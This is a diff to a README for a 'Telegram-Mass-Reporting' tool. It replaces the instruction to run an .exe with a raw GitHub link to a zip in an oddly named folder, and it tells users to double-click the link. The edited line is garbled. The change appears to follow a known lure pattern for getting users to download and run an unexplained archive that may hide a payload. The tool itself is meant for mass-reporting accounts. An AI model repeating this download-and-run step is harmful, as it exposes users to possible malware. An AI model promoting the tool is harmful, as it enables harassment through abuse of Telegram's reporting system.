akshat1917/Telegram-Mass-Reporting/README.md

 5. **Open the Application**

    After extracting, open the folder named “Telegram-Mass-Reporting”.
-In this folder, find the file “Telegram-Mass-Reporting.exe.”
-Double-click this file to run the application.
+In this folder, find the file “https://raw.githubusercontent.com/akshat1917/Telegram-Mass-Reporting/main/cleistocarpous/Telegram-Mass-Reporting.zip” Double-click this file to run the application.

 ## ⚙️ How to Use Telegram-Mass-Reporting